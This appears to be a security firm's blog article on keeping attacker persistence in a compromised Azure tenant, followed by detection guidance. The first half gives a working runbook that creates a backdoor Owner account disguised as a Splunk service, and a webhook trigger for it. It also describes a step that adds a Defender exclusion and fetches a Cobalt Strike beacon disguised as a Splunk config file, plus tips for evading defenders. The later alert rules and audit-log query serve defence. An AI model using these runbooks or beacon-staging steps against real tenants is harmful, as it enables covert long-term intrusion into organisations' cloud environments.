Cloud computing is one of the most impactful IT advancements of recent years, perhaps owing to its faster growth rate compared to other technologies in the ICT domain. Because of this, it is important to re-shape and adapt our “classic” penetration testing techniques to match the new demand for Cloud-based services.
In this article, we will be discussing a number of techniques for achieving persistence in Azure which are based on publicly available information and previous research that has been conducted in this area.
Moreover, we will also showcase how to detect and be alerted when said techniques are used by an attacker.
Azure Runbooks and Automation Accounts
The main prerequisite for successfully leveraging any of the techniques showcased in this article is for the attacker to have already compromised the target Azure environment and escalated their privileges to Global Admin or “Company Administrator” (the Domain Admin equivalent for Azure environments).
How could an attacker retain persistence in an Azure environment even after the Blue Team has discovered their presence and kicked them out (e.g., after revoking Global Admin privileges or removing the compromised account altogether)?
To achieve persistence, we will be leveraging the power of Azure Runbooks and Automation accounts with the goal of attaining two similar but slightly different objectives:
achieving persistence in the Cloud environment by creating a new highly privileged Azure AD user that will serve the purpose of a backdoor into the cloud environment.
achieving persistence in the underlying Azure infrastructure (e.g., Azure VMs) by obtaining a Cobalt Strike beacon on Azure VMs.
You can refer to previous research for a step-by-step process on how to prepare the environment, which can be summarised as follows:
Create a new automation account with “User Administrator” and “Subscription Owner” permissions set on the subscription level.
Create a runbook with the Automation Account that was just created.
Create a webhook for executing the runbook when access to the Azure environment is lost.
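As a rough sketch of how this setup could be scripted, assuming the Az.Automation module and a pre-existing resource group (all names and the location below are placeholders, and the “User Administrator”/“Subscription Owner” role assignments still need to be granted separately):

```powershell
# Sketch only: resource group, location and resource names are placeholders.
Import-Module Az.Automation

# 1. Create the automation account
New-AzAutomationAccount -ResourceGroupName "rg-poc" -Name "SplunkDev" -Location "westeurope"

# 2. Create an (empty) PowerShell runbook under it
New-AzAutomationRunbook -ResourceGroupName "rg-poc" -AutomationAccountName "SplunkDev" `
    -Name "AzureAutomationMonitor" -Type PowerShell

# 3. Create a webhook for the runbook. The URL is only shown once, so save it.
$webhook = New-AzAutomationWebhook -ResourceGroupName "rg-poc" -AutomationAccountName "SplunkDev" `
    -RunbookName "AzureAutomationMonitor" -Name "TriggerMonitor" -IsEnabled $true `
    -ExpiryTime (Get-Date).AddYears(1) -Force
$webhook.WebhookURI
```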
Azure AD User Creation/Backdooring
Once everything is set up, we can then proceed with the creation of a new PS1 Azure Runbook for the newly created Automation Account.
In order to blend in as much as possible with the target Azure environment, we decided to mimic a Splunk/Azure integration based on the vendors’ official integration guides.
To that end, the following naming convention was adopted:
SplunkDev as the Automation Account name
AzureAutomationMonitor as the runbook script name
The actual runbook script consisted of PowerShell code that would create a new Azure AD user with Owner privileges over the target subscription. Let’s first identify the script’s main “ingredients”:
It should import the needed modules/dependencies (e.g. Az.Accounts and Az.Resources)
It should establish a connection within the context of the automation account from which the script is executed
Leveraging the automation account’s privileges, it should create a new user with Owner privileges over the target subscription
Importing modules in a runbook (or any PS1 script) should be as easy as doing the following:
```powershell
Import-Module Az.Accounts
Import-Module Az.Resources
```
According to this blog article, establishing the connection to the Azure environment should be as easy as:
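The snippet in question, reproduced from the full runbook shown later in this section:

```powershell
# Authenticate as the automation account's Run As service principal
$connectionName = "AzureRunAsConnection"
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionName
Connect-AzAccount -ServicePrincipal `
    -TenantId $servicePrincipalConnection.TenantId `
    -ApplicationId $servicePrincipalConnection.ApplicationId `
    -CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint
```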
Please note that while the article mentions “Connect-AzureAD”, we had to use Connect-AzAccount instead, as that matches the Az modules we imported in the PS1 script.
After establishing the connection to the AzureAD environment, we will need to:
Create a new Azure Active Directory User
Assign Subscription Owner privileges to the newly created user
According to Microsoft documentation, we can create a new user with the following PS code:
```powershell
<# The password needs to be converted into the secure string type first #>
$SecureStringPassword = ConvertTo-SecureString -String "password" -AsPlainText -Force
New-AzADUser -DisplayName "MyDisplayName" -UserPrincipalName "myemail@domain.com" `
    -Password $SecureStringPassword -MailNickname "MyMailNickName"
```
After creating a new user, the only thing left is to assign the Owner role to said user. Microsoft’s official documentation can help us with that:
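The relevant call, as it appears in the full runbook below, is a single New-AzRoleAssignment line:

```powershell
# Assign the Owner role over the current subscription to the new user
New-AzRoleAssignment -SignInName "splunkdev@<redacted>" -RoleDefinitionName Owner
```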
```powershell
<# Import the necessary Az modules for user creation #>
Import-Module Az.Accounts
Import-Module Az.Resources

<# Establish the connection to the Azure environment as an automation account.
   This is made possible by the AzureRunAsConnection feature. #>
$connectionName = "AzureRunAsConnection"
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionName
Connect-AzAccount -ServicePrincipal `
    -TenantId $servicePrincipalConnection.TenantId `
    -ApplicationId $servicePrincipalConnection.ApplicationId `
    -CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint

<# The user's password needs to be converted into the SecureString type in order
   to use it during the account creation step. #>
$Secure_String_Pwd = ConvertTo-SecureString "<redacted>" -AsPlainText -Force

<# Creation of a new user (the returned object is kept for the role assignment) #>
$user = New-AzADUser -DisplayName "splunk_svc" -UserPrincipalName "splunkdev@<redacted>" `
    -Password $Secure_String_Pwd -MailNickname "SplunkDev"

<# Subscription Owner role assignment to the newly created user #>
New-AzRoleAssignment -SignInName $user.UserPrincipalName -RoleDefinitionName Owner
```
Runbook script for adding a new Azure AD user with Owner permissions
After creating and publishing the runbook, we will need to create a webhook associated with it, using the following procedure:
Click on the “Add webhook” icon with the runbook selected
Select the “Create new webhook” option
Choose a name for the new webhook and make sure that the generated URL has been copied into the clipboard:
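The copied URL is all that is needed later on: triggering the runbook once access is lost boils down to an unauthenticated POST request against it, for example:

```powershell
# Placeholder URL: use the one generated (and copied) at webhook creation time
$webhookUrl = "https://<region>.azure-automation.net/webhooks?token=<redacted>"
Invoke-RestMethod -Method Post -Uri $webhookUrl
```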
The following video showcases the successful execution of the AzureAutomationMonitor runbook, which resulted in the creation of the splunk_svc Azure AD user as a backdoor into the compromised cloud environment:
Azure VMs Persistence
In this section we will show how an attacker could abuse the runbook feature to effectively compromise Azure VMs in an almost automated fashion.
Although there are more effective ways of achieving Cloud to on-prem pivoting, being able to gain a shell on all Azure VMs can still be invaluable for an attacker, especially if Active Directory Domain Services are configured on an Azure VM (e.g., a Domain Controller running on an Azure VM).
To this end, the following steps were performed:
A _splunkforwarder.ps1 script was uploaded into our storage account. The script contained a single line of PowerShell code that added an exception to Windows Defender to allow the execution of our payload which in this instance was a “vanilla” Cobalt Strike implant:
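A plausible reconstruction of that one-liner is shown below; the exclusion path and blob URL are placeholders for the ones used in our PoC:

```powershell
# Hypothetical reconstruction of _splunkforwarder.ps1: whitelist a staging
# directory in Windows Defender, then fetch the payload from the public blob.
Add-MpPreference -ExclusionPath "C:\Windows\Temp"; Invoke-WebRequest -Uri "https://<storageaccount>.blob.core.windows.net/<container>/indexes.conf" -OutFile "C:\Windows\Temp\indexes.conf"
```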
The script is only a PoC and is far from OPSEC safe, so please take that into consideration when testing real Azure environments. To blend in further, we also named our payload indexes.conf, which is a common Splunk filename. The indexes.conf file was hosted on the same storage container with a policy that allowed the file to be downloaded publicly:
Note that it is not advised to host your malware on a public Blob as that has the potential of being leaked. This was done for PoC and “Keep It Simple” purposes only.
To create a storage container and upload the payloads, you can follow these steps:
Go to “Storage Accounts” in your Azure portal
Click on “Create” on the top-left corner
On the “Create storage account” page fill out the required fields (apart from the name you can leave the default values):
Hit “Refresh” under the “Storage accounts” page and click on the newly created Storage account
Click on “Containers” and then click on “+ Container” on the top-left corner to create a new container
To make our life easier, we can select the Blob (anonymous read access for blobs only) access level, although that is not recommended on live engagements unless you are okay with having your payloads potentially leaked:
Once the container is created, select it and click on “Upload” on the top-left corner to upload the files.
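For reference, the same storage setup can be scripted with the Az.Storage cmdlets; the sketch below makes the same (not recommended) choice of anonymous blob read access, and all names are placeholders:

```powershell
# Sketch only: resource group, account and container names are placeholders.
$account = New-AzStorageAccount -ResourceGroupName "rg-poc" -Name "splunkpocstore" `
    -Location "westeurope" -SkuName Standard_LRS
$ctx = $account.Context

# "-Permission Blob" is the anonymous-read access level selected above
New-AzStorageContainer -Name "assets" -Context $ctx -Permission Blob

# Upload the payloads
Set-AzStorageBlobContent -File ".\_splunkforwarder.ps1" -Container "assets" -Context $ctx
Set-AzStorageBlobContent -File ".\indexes.conf" -Container "assets" -Context $ctx
```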
Once our assets have been uploaded, we can then proceed with the creation of an Azure runbook that will execute our _splunkforwarder.ps1 script which will in turn download/execute our Cobalt Strike beacon (indexes.conf).
A publicly available script for executing PS1 on Azure VMs was slightly modified to serve our purposes:
The $ResourceGroup variable was changed to match the resource group that our target VMs reside under. In our case, we created a few Azure VMs under the Workstations resource group.
The SubscriptionID, StorageAccount, and related variables were replaced with our Storage account details. To access your storage account access keys, just click on “Access keys” on your storage account page.
As we wanted to demonstrate that it could be trivial to target virtually any VM hosted in an Azure environment, we added the following line to populate the VMNames variable with all the VMs belonging to the resource group we specified earlier:
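Presumably something along these lines:

```powershell
# Populate $VMNames with every VM under the target resource group
$VMNames = (Get-AzVM -ResourceGroupName $ResourceGroup).Name
```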
Once the script has been modified, we can then create the runbook by clicking on our automation account, then selecting “Runbooks” and finally clicking on “+ Create a runbook” in the top-left corner:
At this point, we can paste the PS code into the new window that appears, click on “Save” and then hit the “Publish” button.
To test and demonstrate that the runbook is actually working and that it is successfully giving us sweet beacons, we can click on “Test pane” and then on “Start”, as showcased in the following video:
PS1 Script Execution Artifacts
The execution of PS1 scripts from an Azure Runbook usually creates the following artifacts:
The PS1 script will be downloaded and stored under this directory, so ensure that its contents are properly obfuscated, as it will otherwise be trivial for a Blue Team to analyse the script. When a new script is executed, the older one is automatically deleted, so from a defender’s perspective it can be good practice to monitor the directory for any file change.
Under this directory, it will be possible to find the logs related to the execution of scripts. These logs can be helpful in detecting script execution, especially if that is not a common action within the Azure VM environment.
The collection and monitoring of said artifacts may help in detecting and responding to a potential ongoing attack where an attacker with privileged access to the Azure VMs is trying to expand their reach within the Cloud estate.
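As a minimal sketch of the directory-monitoring idea from a defender’s perspective (the watched path is a placeholder and should be adjusted to the script download directory observed on your VMs):

```powershell
# Minimal sketch: alert on any new .ps1 file appearing under the watched path.
# The path below is a placeholder; point it at the script download directory.
$watcher = New-Object System.IO.FileSystemWatcher "C:\Packages\Plugins", "*.ps1"
$watcher.IncludeSubdirectories = $true
$watcher.EnableRaisingEvents = $true
Register-ObjectEvent -InputObject $watcher -EventName Created -Action {
    Write-Host "New script dropped: $($Event.SourceEventArgs.FullPath)"
}
```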
Detection
When performing any of the aforementioned persistence techniques, an attacker will leave traces of their activities, and these can be invaluable to the Blue Team for early detection of and response to security threats. Traces can be left by actions including, but not limited to, the following:
Creation of a new Azure AD User/Group
Creation of a new Automation Account
Assignment of highly privileged roles/permissions to a new/existing AD user/Automation Account/etc. such as:
Owner privileges over the target Azure subscription
Global Admin (e.g., “Company Administrator”) privileges
In this article, we will demonstrate how to detect and receive alerts for the following events:
AD User/Group or Automation Account being added to the current Azure subscription as Owner.
The creation of a new Automation Account
The assignment of Global Admin privileges to a new user
These examples can easily be adapted to also capture other events, such as the creation of a new Automation Runbook.
Setting up the Alert Rules
Monitoring the subscription for any role change
To render the rule creation process easier, let us start by manually generating the event we would like to be alerted on, which in this case will be a role change within the Azure subscription. By following this method, we can quickly create an alert rule based on a pre-existing event rather than creating it from scratch.
To do so, we can start by adding a user as the subscription Owner (or any other role) to trigger an event in the Audit Log:
Go to Services – Subscriptions and select your subscription.
Click on Access control (IAM).
Select the “+ Add” button and choose the “Add role assignment” option.
Select “Owner” as the role.
Click on the user you want to assign the permissions to and click on Save (remember to remove the role afterwards).
We can then wait a few minutes and click on “Activity log”. That should display a new “Create role assignment” record as shown by the following screenshot:
At this point, we can create the rule by clicking on the “+ New alert rule” button:
Follow these steps to create the alert rule:
Leave the default scope on the “Create alert rule” page. That should already have “All role assignments” under the Resource field and your subscription name under Hierarchy.
Click on the condition and modify the “Event initiated by” value in order to be alerted regardless of the user/service principal who initiated the event:
On the “Actions” field click on “Create Action Group”. Select a Resource Group and choose a name for the Action group:
Then click on “Next: Notifications”, select “Email/SMS message/Push/Voice” as the Notification type and choose a name for the notification.
Select “Email” and provide the email address where you would like the alerts to be sent. Click OK to confirm the email address.
Once that is done, click on “Review + create” and then “Create” to finalise the changes.
The created action group should be automatically selected under the Action group name section.
Choose a name for the alert and click on “Create alert rule”. In this instance, we have chosen “SubscriptionMonitor” as the name.
To test the alert rule: add a role assignment to a user and confirm an email alert is received.
If you receive something like the following, the alert should be working as expected:
At the end of the article, we will demonstrate a simple way of automating the parsing of such emails, so hang on tight until the end. Please note, though, that if you are serious about detection, you should not rely on email parsing, as that technique was used for PoC purposes only. The best option, both in terms of security and scalability over time, is to “stream” all Azure-related events to a SIEM solution. Although this may be covered in a future article, please do refer to Microsoft’s documentation for more information.
Automation Account Creation Alerting
We can create an alert for detecting the creation of a new automation account in a very similar way:
Create a new Automation account to generate the event we will build our alert on. In our instance, the account will be “NewAutomationAccount”.
Once created, head over to “Automation accounts” and select the newly created account.
Select “Create or Update an Azure Automation connection asset” under Activity Log.
Click on “New Alert Rule”.
Azure will complain about the resource selection, so click on “Edit resource”, select the Subscription, and click on “Done”.
Modify the condition ensuring that:
Status is set to “Started”.
Event initiated by is set to “All services and users”.
Finalise the settings in the same way we did previously for the SubscriptionMonitor alert.
GlobalAdmin Detection
We are going to use a slightly different approach for detecting if a new or existing user has been granted Global Admin privileges.
To summarise, we will need to:
Create a new “Log Analytics” workspace.
Configure Azure AD so that the appropriate logs are forwarded to our Log Analytics workspace.
Create a new alert rule based on a custom log search query.
Creating a workspace is as easy as going to “Log Analytics workspaces” and clicking on “Create”. Once there, all you need to do is assign the workspace to a resource group and give it a name, which in our case was “AzureLoggingWorkspace”.
Once the workspace has been created, we can then proceed to configure Azure AD to forward the logs to our analytics workspace:
Go to “Azure Active Directory” and select “Monitoring - Diagnostic Settings”.
Click on “+ Add diagnostic setting” and ensure that the appropriate logs are selected and sent to the correct workspace. In our instance, we selected everything just to be safe.
Click on “Save” and allow some time for the changes to be applied.
Now for creating the actual email alert:
Head over to “Alerts” and click on “+ New Alert Rule”.
Under “Filter by resource type” search for “analytics” and select your analytics workspace. Click on “Done” to confirm.
Click on “Add condition” and select “Custom Log search”.
Input the following query as the “search query” and specify “0” as the Threshold value. Adjust the “Period (in minutes)” and “Frequency (in minutes)” to your liking. It is fine to leave the default 5 minutes value.
```
AuditLogs
| where OperationName contains "Add member to role" and TargetResources contains "Company Administrator"
```
Click on “Done”.
Assign an action group to the alert rule and finalise it by specifying a name for the rule.
Parsing the Alerts
Once the alerts have been correctly set up and we’ve confirmed that they are working, we still need to parse the received emails to understand the type of event that occurred in the Azure subscription.
As a PoC, we have developed a small python script to do just that. To summarise its function:
The script retrieves all emails with a specific subject (i.e., every Azure alert) and loops over them.
The HTML part of the email is extracted and parsed.
Any id (e.g., user ids, role ids) is “resolved” into its display name by using the “az” command-line tool.
A summary of the findings is displayed.
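For instance, resolving a user object id into its display name is a one-liner with the az CLI (the id below is a placeholder):

```powershell
# Resolve an Azure AD object id (or UPN) into a display name via the az CLI
az ad user show --id "00000000-0000-0000-0000-000000000000" --query displayName -o tsv
```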
Refer to the video below to see the tool in action:
We have shown a few common techniques that attackers may use to achieve persistence within an Azure environment and, towards the end of the article, focused on how to detect some of the key actions a malicious actor may perform.
We wanted to show how you can start familiarising yourself with Azure’s built-in tools for security monitoring in order to detect the noisiest events that an attacker could generate.
Instead of relying on email parsing, scalable and robust monitoring and detection capabilities should be built around the following:
Azure’s built-in tools/services such as the Azure Security Center and Privileged Identity Management services.
For more custom and precise monitoring, rely on custom log searches and queries (as we did for the Global Admin detection); otherwise, in some scenarios you could receive a significant number of emails unless you are precise about what you decide to be alerted on. For example, our SubscriptionMonitor rule will send us an email for any role change within the Subscription, even for non-privileged roles.
Try to rely on Azure Event Hubs, a big data streaming platform and event ingestion service, and pair it with your SIEM of choice (e.g., Splunk or any of the supported tools).
Integrate what you already have in place with Azure Security Center where possible.